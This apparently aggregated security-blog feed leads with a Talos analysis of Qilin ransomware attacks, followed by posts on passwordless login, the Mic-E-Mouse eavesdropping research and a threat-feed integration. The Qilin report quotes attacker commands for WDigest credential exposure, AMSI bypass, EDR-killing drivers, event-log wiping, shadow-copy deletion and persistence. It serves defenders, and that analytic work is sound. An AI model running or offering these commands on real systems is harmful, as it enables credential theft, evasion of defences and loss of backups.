• In the second half of 2025, the ransomware group Qilin has continued to publish victim information on its leak site at a pace of more than 40 cases per month, making it one of the most impactful ransomware groups worldwide. The manufacturing sector has been the most affected, followed by professional and scientific services, and wholesale trade.
• Although this could be a false flag, some of the scripts used by the attacker contained character encodings that point to Eastern Europe or a Russian-speaking region.
• Talos identified an open-source tool named Cyberduck, which enables file transfers to cloud servers, among the tools used for data exfiltration. In recent trends, Cyberduck has been widely abused in cases involving Qilin ransomware. Artifact logs also show the use of notepad.exe and mspaint.exe, which were leveraged to view high-sensitivity information.
• In Qilin cases, we observed dual deployments: encryptor_1.exe spreads via PsExec across hosts, while encryptor_2.exe runs from one system to encrypt multiple network shares.

Summary of Qilin Ransomware

The Qilin (formerly Agenda) ransomware group has been active since around July 2022. This group employs a double-extortion strategy, combining file encryption with the public disclosure of stolen information. Figure 1 illustrates the leak site used by the attackers to publish lists of compromised companies.

Over the past several years, Qilin has expanded its operations and now ranks among the most prolific and damaging ransomware threats on a global scale. The group adopts a Ransomware-as-a-Service (RaaS) business model, where it develops and distributes ransomware platforms and associated tools to affiliates. In turn, these affiliates attack organizations worldwide.

Victimology and prevalence 

Current reporting indicates that the countries most severely affected include the United States, followed by Canada, the United Kingdom, France, and Germany.

Figure 3 illustrates the number of victims whose information was posted on Qilin ransomware leak site.

The data shows that the number of postings reached a peak of 100 cases in June 2025, with a nearly equivalent figure recorded again in August. Although the number of victims fluctuates from month to month, it is noteworthy that, except for January, every month recorded more than 40 cases. These findings indicate that Qilin continues to pose a persistent and significant threat.

The most heavily affected sector is manufacturing, which accounts for approximately 23% of all reported cases, significantly outpacing other industries. The second most impacted sector is professional and scientific services, representing around 18%. Wholesale trade ranks third, with about 10% of cases.

In the mid-range, several key sectors that form part of social infrastructure-healthcare, construction, retail, education, and finance-each report similar levels of impact, averaging around 5%.

At the lower end, sectors such as services and primary industries show relatively fewer incidents, remaining below 2% on average.

Qilin ransomware attack flow

In 2025, Cisco Talos responded to multiple incidents related to Qilin ransomware. The overall attack flow is illustrated in Figure 5, and subsequent sections provide a detailed description of the tactics, techniques, and procedures (TTPs) observed in each phase.

Latest Qilin TTPs

Initial access

Talos was unable to definitively identify a single, confirmed initial intrusion vector. However, in some cases, we assess with moderate confidence that attackers abused administrative credentials leaked on the dark web to gain VPN access, and may have also used Group Policy (AD GPO) changes enabling RDP to reach victim networks.

In the incident illustrated in Figure 6, Talos confirmed that credentials had been exposed on the dark web. Approximately two weeks later, numerous NTLM authentication attempts were made against the VPN, possibly using the leaked credentials. The resulted in a successful intrusion. From the compromised VPN, the attackers performed RDP connections to the domain controller and the initially breached host. While the activity is temporally correlated with the previously observed credential exposure, there is insufficient evidence to establish a definitive causal link between the two events.

Notably, the VPN implicated in this case had no multi-factor authentication (MFA) configured, which would allow an attacker with credentials unfettered access.

Reconnaissance and discovery

After gaining access to the victim’s network, the threat actor executed nltest.exe and net.exe to enumerate domain controllers and collect domain user information.

nltest /dclist:<Domain>
net user <Username> /domain

In addition, traces indicate that the adversary attempted to assess user privilege levels through execution of the whoami command, enumerated active processes such as explorer.exe via the tasklist command, and utilized the netscan tool for further reconnaissance.

C:WINDOWSsystem32whoami.exe /priv
tasklist /FI "IMAGENAME eq explorer.exe" /FO CSV /NH

As described in the “Qilin Ransomware” section below, execution of the ransomware also resulted in enumeration of hostnames, domain users, groups, and privileges.

Credential access and exfiltration

In the cases Talos examined, we identified a password-protected folder containing a collection of tools, apparently intended for credential theft. Although the archive prevented full inspection of every file, its contents suggest use of mimikatz, several password recovery utilities published by NirSoft, and custom script files.

The “!light.bat batch” file includes a reg add command that modifies the WDigest registry setting. By setting “UseLogonCredential” to 1, Windows is configured to retain plaintext logon credentials in memory at authentication, a behavior that can be exploited by credential-dumping tools such as Mimikatz to extract user passwords.

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /f /d 1

After executing the reg add command, the batch file sequentially invoked netpass.exe, WebBrowserPassView.exe, BypassCredGuard.exe, SharpDecryptPwd, and ultimately Mimikatz. Within the script (see Figure 8), SharpDecryptPwd is configured to extract, redirect, and persist stored authentication data from multiple client applications — including WinSCP, Navicat, Xmanager, TeamViewer, FileZilla, Foxmail, TortoiseSVN, Google Chrome, RDCMan, and SunLogin, thereby consolidating harvested credentials for subsequent use or exfiltration.

Following the execution of SharpDecryptPwd, !light.bat launched Mimikatz. (Figure 9).

Commands executed via Mimikatz targeted a range of sensitive data and system functions, including clearing Windows event logs, enabling SeDebugPrivilege, extracting saved passwords from Chrome’s SQLite database, recovering credentials from previous logons, and harvesting credentials and configuration data related to RDP, SSH, and Citrix.

pars.vbs formatted and consolidated the stolen data into a “result.txt” file, which was subsequently exfiltrated to an attacker-controlled SMTP server (Figure 10). The script specifies the windows-1251 character encoding (Cyrillic), which may suggest the attacker or operator is from Eastern Europe or a Russian-speaking region.

Artifacts of exfiltration

Once collected, WinRAR packaged the targeted data, and in some cases the archives were exfiltrated using open-source software. Below are the actual arguments used to run WinRAR.exe. The WinRAR command is configured to exclude the base folder and to create the archive without recursively processing subdirectories.

C:Program FilesWinRARWinRAR.exe a -ep1 -scul -r0 -iext -imon1 --.  Specify the target files and directories

Furthermore, Talos found that the attackers used mspaint.exe, notepad.exe, and iexplore.exe to open and inspect files while searching through numerous files for sensitive information.

In recent trends, the open-source software Cyberduck — which enables file transfers to cloud servers — has been widely abused in cases involving Qilin ransomware. By abusing legitimate cloud-based services for exfiltration, the attacker can obfuscate their activities within trusted domains and legitimate web traffic. As shown in Figure 12, the Cyberduck history file indicates that a Backblaze host was specified as the destination and that a custom setting for split/multipart uploads was enabled to transfer large files.

Privilege escalation and lateral movement

Using the stolen credentials described above, threat actor proceeds with privilege escalation and lateral movement. Talos has observed compromised accounts accessing multiple IP addresses and their network shares, as well as numerous NTLM authentication attempts against many VPN accounts , possibly using the leaked credentials. Additionally, to enable remote access they modify firewall settings, execute commands to change RDP settings via the registry, and perform related activities such as using rdpclip.exe and similar mechanisms.

reg add HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

The following command adds a specific account designated by the attacker to the local administrators group. This grants them full control over the system.

C:Windowssystem32net1 localgroup administrators  /add

They also run a command to create a network share named “c” that exposes the entire C: drive and assigns Full Control to the Everyone group, allowing unrestricted access and modification.

net share c=c: /grant : everyone,full

• T1219: Remote Access Software

The attacker installed software that was different from the legitimately used Remote Monitoring and Management (RMM) tools; this occurred before the ransomware was executed. While Talos cannot definitively conclude that the installed RMM was used for lateral movement, traces of multiple RMM tools were observed, including AnyDesk, Chrome Remote Desktop, Distant Desktop, GoToDesk, QuickAssist, and ScreenConnect. Figure 13 shows an excerpt of an actual ScreenConnect connection log, which indicates that ScreenConnect established a connection to the command and control(C2) server on port 8880.

Defense evasion

• Obfuscated Powershell

Figure 14 and Figure 15 show two patterns of obfuscated PowerShell code, encoded using numeric encoding, intended to evade detection

Below is the decoded output of the above code.

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
reg add HKLMSYSTEMCurrentControlSetControlLsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD

Executing these commands makes three configuration changes. First, disabling AMSI prevents interference with execution of payloads such as batch files and malware. Second, disabling TLS certificate validation removes barriers to contacting malicious domains or C2 servers. Finally, enabling Restricted Admin causes RDP authentication to rely on NT hashes or Kerberos tickets rather than passwords. Although passwords are not retained, NT hashes remain on the system and can be abused by an attacker to impersonate the user.

1. Disable AMSI
2. Disable TLS certificate validation
3. Enable Restricted Admin

Disable EDR

Talos observed traces of attempts to disable EDR using multiple methods. Broadly speaking, we have frequently observed commands that directly execute the EDR’s “uninstall.exe” or attempt to stop services using the sc command. At the same time, attackers have also been observed running open-source tools such as dark-kill and HRSword. The commands below are traces of dark-kill usage. Instead of running in normal user mode, dark.sys is specified as a driver loaded into the Windows kernel and the service is started under the name dark. The traces also show that, as needed, attackers re-register a driver from a different path and finally remove the service to erase their tracks.

sc create dark type= kernel binPath=dark.sys
sc start dark
sc create dark type= kernel binPath=C:Users<user>DownloadsDarkKillDebugdark.sys
sc delete dark

Additionally, to execute “HRSword.exe”, attackers attempt to run a batch file with administrator privileges by using VBScript via mshta, specifying the runas option in ShellExecute. Because logs show that a shortcut file HRSword.lnk was created after 1. bat was executed, it is possible that HRSword.exe is being launched via that .lnk file.

mshta vbscript:CreateObject(Shell.Application).ShellExecute(cmd.exe,/c C:UsersxxxxxHRSwordHRSWOR~1.BAT ::,,runas,1)

Impact and inhibit recovery

Before Qilin ransomware is executed, Talos has observed cases in which remote access tools such as Cobalt Strike loader and SystemBC are run. Cobalt Strike was discovered on the compromised host earlier, but it is not clear whether Cobalt Strike installed SystemBC.

Cobalt Strike Loader

The Cobalt Strike loader Talos examined decrypts the encrypted payload contained in the .bss section of the binary shown in Figure 16, then deploys and executes the Cobalt Strike Beacon in memory.

The embedded encrypted payload is executed in memory following the flow shown in Figure 17. The CreateThreadpoolWait and SetThreadpoolWait APIs are Windows thread-pool APIs. Unlike the commonly used CreateThread API (which immediately creates a new thread and begins executing code at a specified address), they wait for events or object state changes and then automatically run worker callbacks.

In this code, the decrypted_buf is registered as the callback function via the arguments to CreateThreadpoolWait, creating a mechanism that will invoke this callback when the wait object becomes signaled. After that, execute permission is granted with VirtualProtect, and a MessageBoxA (shown in the figure and intended for anti-sandbox purposes) prompts for user interaction. When the user clicks OK, SetThreadpoolWait is called. Because EventA was created with an initial signaled state (bInitialState = 1), the decrypted code already mapped into memory runs immediately.

For decryption, a custom routine based on RC4 is implemented: the first 2,048 bytes are fully decrypted, and thereafter decryption is performed in 32-byte units in which only the first 24 bytes are decrypted. The remaining 8 bytes stay encrypted, so this behavior differs from standard RC4.

Cobalt Strike Beacon

The Cobalt Strike Beacon deployed in memory is configured (from its config) as Cobalt Strike version 4.x, with Malleable C2 used to spoof HTTP headers. In this configuration the http_get_header and http_post_header include “Host: ocsp.verisign.com”, effectively separating the visible host header from the actual destination to make the traffic appear as OCSP or certificate distribution traffic. Communication is set to use HTTPS over TCP port 443 to the Team Server (C2).

Qilin Ransomware

In several cases, a variant of Qilin ransomware, known as “Qilin.B”, was used.

This section describes its behavior. For more information, please refer to Halcyon’s analysis article published in October 2024.

Execution method

Attackers sometimes run only a single encryptor, but Talos has also observed cases where two encryptor are deployed. In cases where two encryptor are executed, the first, encryptor_1.exe, was distributed across the environment using PsExec (see the command below). This command copies the local <encryptor_1>.exe to the remote \IP address, elevates it to run with administrative privileges, and then launches it. The other, “encryptor_2.exe”, is executed from a single system and targets multiple network shares.

cmd /C [PsExec] -accepteula \IP Address -c -f -h -d -i
C:Usersxxx<encryptor_1>.exe --password [PASSWORD] --spread --spread-process

PowerShell command executed

A PowerShell command is being executed to efficiently retrieve the hostnames of all computers from Active Directory (AD).

powershell -Command Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName

Another PowerShell command observed is one that installs the Remote Server Administration Tools for AD (the RSAT-AD-PowerShell module). It runs PowerShell cmdlets related to Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS). This enables enumeration of domain users, groups, and privileges.

Powershell -Command ServerManagerCmd.exe -i RSAT-AD-PowerShell ; Install-WindowsFeature RSAT-AD-PowerShell ; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0' 

Next, the command Get-WinEvent -ListLog * is used to enumerate all event logs on the system. Logs that contain records (where RecordCount is not 0) are filtered, and the .NET EventLogSession.GlobalSession.ClearLog() method is called to wipe them entirely.

powershell $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in  $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}

Finally, the PowerShell script targeting hosts in virtualized environments is hard-coded.

As part of its PowerShell operation, it establishes a connection to the vCenter server, enumerates all datacenters and clusters within the vCenter environment, and disables HA and DRS in cluster configurations. (see Figure 21)

It then enumerates all ESXi hosts, changes the root password, and enables SSH access. Finally, it uploads an arbitrary binary to the “/tmp” directory and executes it across all identified hosts. It makes the binary executable with “chmod +x”, sets “/User/execInstalledOnly” to 0 via the $esxiRights command (thereby allowing execution of unsigned binaries) , and then executes the payload on all hosts using the Process-ESXis function.

For lateral movement

To broaden the scope of file access and increase the impact when ransomware is executed, the fsutil command is also run. This command performs operations on symbolic links; R2R means Remote to Remote (a network share to another network share), and R2L means Remote to Local (a network share to local). By executing these two commands and enabling each respectively, attackers can achieve different effects. for example, in R2R, a symbolic link on server A can be used to reference files on another server B; in R2L, if a shared symbolic link on server A points to a file on the host, an attacker can access the host’s local file through that link. These commands may be executed using PsExec.

cmd /C net use
cmd /C fsutil behavior set SymlinkEvaluation R2R:1
cmd /C fsutil behavior set SymlinkEvaluation R2L:1

Delete backup

The ransomware changes the Volume Shadow Copy Service (VSS) startup type to Manual, and delete all shadow copies (volume snapshots) maintained by VSS.

cmd /C net start vss
cmd /C wmic service where name='vss' call ChangeStartMode Manual
cmd /C vssadmin.exe Delete Shadows /all /quiet
cmd /C net stop vss
cmd /C wmic service where name='vss' call ChangeStartMode Disabled

Ransom note

The ransom note shown in Figure 23 is created in each encrypted folder. The note primarily states that data has been compromised, includes a link to a leak site on a .onion address that requires a Tor connection, and provides a URL (specified by IP address) that can be accessed without Tor for victims who do not have a Tor environment. It also lists the types of data included and warnings about the consequences of ignoring the demands.

In addition, the ‘Credential’ section states that a unique company ID is assigned as a file extension for each victim company, and that by using the domain URL shown in the note one can access the site with that unique login ID and password.

Config

The config for Qilin Ransomware includes file-encryption settings, service and process stop lists, and a list of entity-specific accounts. There are eight items, four of which are as follows:

• “extension_black_list” contains file extensions that will not be encrypted.
• “extension_white_list” specifies the extensions that this ransomware will explicitly encrypt.
• “filename_black_list” lists filenames that will not be encrypted.
• “directory_black_list” lists directories that will not be encrypted.

We also observed two lists named “white_symlink_dirs” and “white_symlink_subdirs”. In the Qilin ransomware sample we analyzed, white_symlink_dirs is empty, and only thing white_symlink_subdirs contains is the entry “ClusterStorage”.

ClusterStorage refers to the directory name used by Windows Server Failover Cluster (Cluster Shared Volumes, or CSV). CSVs commonly host highly critical files for organizations such as Hyper-V virtual machines (VHDX) and databases. This shows the ransomware is intended to increase impact by targeting not only ordinary user directories but also virtualization and cluster infrastructure directly as hostages. Therefore, files in subdirectories of ClusterStorage are explicitly listed as targets to be encrypted. The fact that white_symlink_dirs is empty is likely intended to avoid following symbolic links that could cause infinite loops or double-encryption.

“process_black_list” and “win_services_black_list” specify processes and services to terminate, including those related to databases, backups, security, and remote management. Notably, as shown in Figure 24, this config also had victim-environment-specific domain, username and password hardcoded. This indicates that the attackers preloaded reconnaissance information into the ransomware to facilitate privilege escalation and related activities.

extension_black_list

["themepack", "nls", "diapkg", "msi", "lnk", "exe", "scr", "bat", "drv", "rtp", "msp", "prf", "msc", "ico", "key", "ocx", "diagcab", "diagcfg", "pdb", "wpx", "hlp", "icns", "rom", "dll", 
"msstyles", "mod", "ps1", "ics", "hta", "bin", "cmd", "ani", "386", "lock", "cur", "idx", "sys", "com", "deskthemepack", "shs", "theme", "mpa", "nomedia", "spl", "cpl", "adv", "icl", "msu", "company_id"]

extension_white_list

["mdf", "ldf", "bak", "vib", "vbk", "vbm", "vrb", "vmdk", "abk", "bkz", "sqb", "trn", "backup", "bkup", "old", "tibx", "pfi", "pvhd", "pbf", "dim", "gho", "vpcbackup", "arc", "mtf", "bkf", "dr"]

filename_black_list

["desktop.ini", "autorun.ini", "ntldr", "bootsect.bak", "thumbs.db", "boot.ini", "ntuser.dat", "iconcache.db", "bootfont.bin", "ntuser.ini", "ntuser.dat.log", "autorun.inf", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "#recycle", "autorun.inf", "boot.ini", "bootfont.bin", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "desktop.ini", "iconcache.db", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini", "thumbs.db", "#recycle", "bootsect.bak"]

directory_black_list

["windows", "system volume information", "intel", "admin$", "ipc$", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "program files (x86)", "program files", "$windows.~bt", "msocache", "tor browser", "programdata", "boot", "config.msi", "google", "perflogs", "appdata", "windows.old", "appdata", "..", ".", "boot", "windows", "windows.old", "$recycle.bin", "admin$"]

white_symlink_subdirs

["ClusterStorage"]

process_black_list

["vmms", "vmwp", "vmcompute", "agntsvc", "dbeng50", "dbsnmp", "encsvc", "excel", "firefox", "infopath", "isqlplussvc", "sql", "msaccess", "mspub", "mydesktopqos", "mydesktopservice", "notepad", "ocautoupds", "ocomm", "ocssd", "onenote", "oracle", "outlook", "powerpnt", "sqbcoreservice", "steam", "synctime", "tbirdconfig", "thebat", "thunderbird", "visio", "winword", "wordpad", "xfssvccon", "bedbh", "vxmon", "benetns", "bengien", "pvlsvr", "beserver", "raw_agent_svc", "vsnapvss", "cagservice", "qbidpservice", "qbdbmgrn", "qbcfmonitorservice", "sap", "teamviewer_service", "teamviewer", "tv_w32", "tv_x64", "cvmountd", "cvd", "cvfwd", "cvods", "saphostexec", "saposcol", "sapstartsrv", "avagent", "avscc", "dellsystemdetect", "enterpriseclient", "veeamnfssvc", "veeamtransportsvc", "veeamdeploymentsvc", "mvdesktopservice"]

win_services_black_list

["vmms", "mepocs", "memtas", "veeam", "backup", "vss", "sql", "msexchange", "sophos", "msexchange", "msexchange\$", "wsbexchange", "pdvfsservice", "backupexecvssprovider", "backupexecagentaccelerator", "backupexecagentbrowser", "backupexecdivecimediaservice", "backupexecjobengine", "backupexecmanagementservice", "backupexecrpcservice", "gxblr", "gxvss", "gxclmgrs", "gxcvd", "gxcimgr", "gxmmm", "gxvsshwprov", "gxfwd", "sapservice", "sap", "sap\$", "sapd\$", "saphostcontrol", "saphostexec", "qbcfmonitorservice", "qbdbmgrn", "qbidpservice", "acronisagent", "veeamnfssvc", "veeamdeploymentservice", "veeamtransportsvc", "mvarmor", "mvarmor64", "vsnapvss", "acrsch2svc", "(.*?)sql(.*?)"]

Accounts

Generating execution logs

When running, it creates a QLOG folder in %TEMP% and multiple ThreadId({Number}).LOG files. They allow the attacker to inspect detailed logs of the encryption process.

Change wallpaper setting

The ransomware creates a JPG image under %TEMP% to be used as the wallpaper, and modifies the following registry values.

HKEY_CURRENT_USERControl PanelDesktopWallpaper
(Example)
Value: C:%TEMP%ElSDJGep.jpg

Persistence

After ransomware execution, the attacker achieves persistence through both task scheduling and registry modification. First, a scheduled task is created with the name “TVInstallRestore”, configured to run at logon using the /SC ONLOGON argument. To disguise itself as a legitimate tool, the ransomware file is named “TeamViewer_Host_Setup – <encryptor_2>.exe”, leveraging the TeamViewer brand (which had been installed as an RMM tool prior to compromise). Second, to ensure the ransomware executes upon every reboot, its executable is added as a value under the RUN registry key.

This combination of scheduled tasks and registry entries allows the ransomware to maintain persistence across system restarts and user logons.

C:WINDOWSsystem32schtasks /Create /TN TVInstallRestore /TR "C:-INSTALLERSTeamViewer_Host_Setup - <encryptor_2>.exe /RESTORE" /RU SYSTEM /SC ONLOGON /F

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
Key
*random-alphabet in lowercase letters
Key Value
C:UsersAdministratorDesktop<encryptor_2>.exe --password [PASSWORD]--no-admin;

Appendix

MITRE ATT&CK TTPs

Coverage

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.　Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort SIDs for the threats are: 65446

ClamAV detections are also available for this threat:

• Win.Ransomware.Qilin-10044197-0
• Win.Trojan.Systembc-10058229-0
• Win.Loader.CobaltStrike-10058228-0
• Win.Dropper.Mimikatz-9778171-1

Indicators of compromise (IOCs)

The IOCs can also be found in our GitHub repository here.

Cisco Talos Blog – ​Read More

By Janet Ho, Cisco Duo

Why passwords are still a problem

We’ve relied on passwords for years to protect our online accounts, but they’ve also become one of the easiest ways attackers get in. Many people reuse or simplify passwords, or even write them down because it’s hard to remember so many. That makes it easier for attackers to take advantage of stolen or reused credentials, and even worse, one stolen password can sometimes unlock several accounts.  

Did you know? According to Forbes, 244 million passwords were leaked on a single crime forum, and half of the world’s internet users have been exposed to reuse attacks. 

That’s why passwordless authentication is becoming so important. It lets you prove who you are without typing a password, using things like your fingerprint, face, or a security key on your device. This makes sign-ins easier for you and harder for attackers to fake, helping protect against phishing and stolen or weak passwords. 

Clearing up the biggest myths about passwordless 

Even with all these benefits, a few common myths still make people hesitate about going passwordless. Let’s clear them up. 

It’s easy to assume that “passwordless” means skipping an important layer of protection. 

In reality, passwordless is multi-factor. It verifies who you are using both your device and something only you can provide like your fingerprint or PIN. 

When you log in, your device unlocks a unique digital key that never leaves it. Your fingerprint, face or PIN is only checked locally, not sent online. This makes it nearly impossible for attackers to steal or fake your login, the same strength as MFA, just without the password hassle. 

A PIN might look like a password, but it doesn’t work the same way. Instead of being sent over the internet or stored on a company server, your PIN only unlocks your device locally. That means there’s nothing for attackers to steal or guess remotely. 

Even a short PIN can be strong because your device limits how many times someone can try it. An attacker would have to physically possess your device to even attempt it. If you want extra protection, you can use a biometric like a fingerprint or face scan instead. 

Biometrics sometimes get a bad reputation because people remember early flaws or scary headlines like phones that could be fooled by photos or fake fingerprints. Those issues came from outdated, low-cost sensors that were easier to trick. 

Modern systems like Face ID and Windows Hello use 3D mapping, infrared light and “liveness” detection to make spoofing extremely difficult. In passwordless authentication, your fingerprint or face simply unlocks a private key stored on your device. That key never leaves your phone or computer and can’t be reused on other sites. Because biometrics are checked locally, not online, they block the remote attacks that plague passwords. 

Some worry that using biometrics means handing over personal data that could be stolen. That concern usually comes from news about biometric surveillance, where information is stored in large central databases.  

Passwordless authentication works differently. Your biometric stays on your device and is only used to unlock a local security key — it’s never uploaded, shared, or compared against a massive database. 

The difference matters. Surveillance biometrics identify you remotely by matching your data against millions of records. Authentication biometrics, like Face ID or Windows Hello, simply confirm that you are the one holding your own device. That local check is what keeps your biometric private and safe. 

A truly phishing-resistant passwordless system has a few built-in protections against modern phishing techniques. 

Each login uses a unique digital key that stays on your device and never gets sent to the website. Even if someone builds a fake login page, there’s nothing to steal or reuse. That’s because passwordless systems check that you’re on the real website, not a look-alike page. Your browser does that check automatically before letting your device complete the login. 

And only trusted software on your device can trigger your authenticator to approve a login. Hidden apps or push-phishing attempts can’t reach it. 

Together, these protections make phishing far harder and, in most cases, stop it completely.  

The bottom line: Easier, safer sign-ins for everyone 

Passwordless isn’t just a new way to log in. It’s a safer, simpler way to protect what matters most. Whether at home or at work, taking small steps toward passwordless helps reduce risk and makes security easier for everyone. 

Learn more about the myths and read the full report on Busting Passwordless Myths. 

Take the next step and check out 5 Step Path to Passwordless ebook. 

Cisco Talos Blog – ​Read More

A recent publication by researchers at the University of California, Irvine, demonstrates a fascinating fact: optical sensors in computer mice have become so sensitive that, in addition to tracking surface movements, they can pick up even minute vibrations — for instance, those generated by a nearby conversation. The theoretical attack, dubbed “Mic-E-Mouse”, could potentially allow adversaries to listen in on discussions in “secure” rooms, provided the attacker can somehow intercept the data transmitted by the mouse. As is often the case with academic papers of this kind, the proposed method comes with quite a few limitations.

Specifics of the Mic-E-Mouse attack

Let’s be clear from the start — not just any old mouse will work for this attack. It specifically requires models with the most sensitive optical sensors. Such a sensor is essentially an extremely simplified video camera that films the surface of the desk at a resolution of 16×16 or 32×32 pixels. The mouse’s internal circuitry compares consecutive frames to determine how far and in which direction the mouse has moved. How often these snapshots are taken determines the mouse’s final resolution, expressed in dots per inch (DPI). The higher the DPI, the less the user has to move the mouse to position the cursor on the screen. There’s also a second metric: the polling rate — the frequency at which the mouse data is transmitted to the computer. A sensitive sensor in a mouse that transmits data infrequently is of no use. For the Mic-E-Mouse attack to even be feasible, the mouse needs both a high resolution (10 000DPI or more) and a high polling rate (4000Hz or more).

Why do these particular specifications matter? Human speech, which the researchers intended to eavesdrop on, is audible in a frequency range of approximately 100 to 6000Hz. Speech causes sound waves, which create vibrations on the surfaces of nearby objects. Capturing these vibrations requires an extremely precise sensor, and the data coming from it must be transmitted to the PC in the most complete form possible — with the data update frequency being most critical. According to the Nyquist–Shannon sampling theorem, an analog signal within a specific frequency range can be digitized if the sampling rate is at least twice the highest frequency of the signal. Consequently, a mouse transmitting data at 4000Hz can theoretically capture an audio frequency range up to a maximum of 2000Hz. But what kind of recording can a mouse capture anyway? Let’s take a look.

In graph (a), the blue color shows the frequency response typical of human speech — this is the source data. Green represents what was captured using the computer mouse. The yellow represents the noise level. The green corresponds very poorly to the original audio information and is almost completely drowned in noise. The same is shown in a spectral view in graph (d). It looks as though it’s impossible to recover anything at all from this information. However, let’s look at graphs (b) and (c). The former shows the original test signals: tones at 200 and 400Hz, as well as a variable frequency signal from 20 to 16 000Hz. The latter shows the same signals, but captured by the computer mouse’s sensor. It’s clear that some information is preserved, although frequencies above 1700Hz can’t be intercepted.

Two different filtering methods were applied to this extremely noisy data. First, the well-known Wiener filtering method, and second, filtering using a machine-learning system trained on clean voice data. Here’s the result.

Shown here from left to right are: the source signal, the raw data from the mouse sensor (with maximum noise), and the two filtering stages. The result is something very closely resembling the source material.

So what kind of attack could be built based on such a recording? The researchers propose the following scenario: two people are holding a conversation in a secure room with a PC in it. The sound of their speech causes air vibrations, which are transmitted to the tabletop, and from the tabletop to the mouse connected to the PC. Malware installed on the PC intercepts the data from the mouse, and sends it to the attackers’ server. There, the signal is processed and filtered to fully reconstruct the speech. Sounds rather horrifying, doesn’t it? Fortunately, this scenario has many issues.

Severe limitations

The key advantage of this method is the unusual attack vector. Obtaining data from the mouse requires no special privileges, meaning security solutions may not even detect the eavesdropping. However, not many applications access detailed data from a mouse, which means the attack would require either writing custom software, or hacking/modifying specialized software that is capable of using such data.

Furthermore, there are currently not many mice models with the required specifications (resolution of 10 000DPI or higher, and polling rate of 4000Hz or more). The researchers found about a dozen potential candidates and tested the attack on two models. These weren’t the most expensive devices — for instance, the Razer Viper 8KHz costs around $50 — but they are gaming mice, which are unlikely to be found connected to a typical workstation. Thus, the Mic-E-Mouse attack is future-proof rather than present-proof: the researchers assume that, over time, high-resolution sensors will become standard even in the most common office models.

The accuracy of the method is low as well. At best, the researchers managed to recognize only 50 to 60 percent of the source material. Finally, we need to consider that for the sake of the experiment, the researchers attempted to simplify their task as much as possible. Instead of capturing a real conversation, they were playing back human speech through computer speakers. A cardboard box with an opening was placed on top of the speakers. This opening was covered with a membrane with the mouse on top of it. This means the sound source was not only artificial, but also located mere inches from the optical sensor! The authors of the paper tried covering the hole with a thin sheet of paper or cardboard, and the recognition accuracy immediately plummeted to unacceptable levels of 10–30%. Reliable transmission of vibrations through a thick tabletop isn’t even a consideration.

Cautious optimism and security model

Credit where it’s due: the researchers found yet another attack vector that exploits unexpected hardware properties — something no one had previously thought of. For a first attempt, the result is remarkable, and the potential for further research is undoubtedly there. After all, the U.S. researchers only used machine learning for signal filtering. The reconstructed audio data was then listened to by human observers. What if neural networks were also used for speech recognition?

Of course, such studies have an extremely narrow practical application. For organizations whose security model must account for even such paranoid scenarios, the authors of the study propose a series of protective measures. For one, you can simply ban connecting mice with high-resolution sensors — both through organizational policies and, technically, by blocklisting specific models. You can also provide employees with mousepads that dampen vibrations. The more relevant conclusion, however, concerns protection against malware: attackers can sometimes utilize completely atypical software features to cause harm — in this case, for espionage. So it’s worth identifying and analyzing even such complex cases; otherwise, it may later be impossible to even determine how a data leak occurred.

Kaspersky official blog – ​Read More

Fresh, actionable IOCs from the latest malware attacks are now available to all security teams using the ThreatQ TIP. ANY.RUN’s Threat Intelligence Feeds integrate seamlessly with the platform, enabling SOCs and MSSPs to boost detection rates, expand threat coverage, and streamline response.  

Here’s how you can benefit from it. 

Real-Time Visibility of the Current Threat Landscape 

As a leading Threat Intelligence Platform (TIP) widely adopted in enterprise SOCs, ThreatQ serves as a powerful indicator management solution, facilitating response. 

ANY.RUN’s Threat Intelligence Feeds connector for ThreatQ provides a real-time stream of fresh, filtered, low-noise network IOC from sandbox investigations of the latest attacks by 15,000+ companies and 500,000+ analysts.  

Follow a guide to implement in your SOC → 

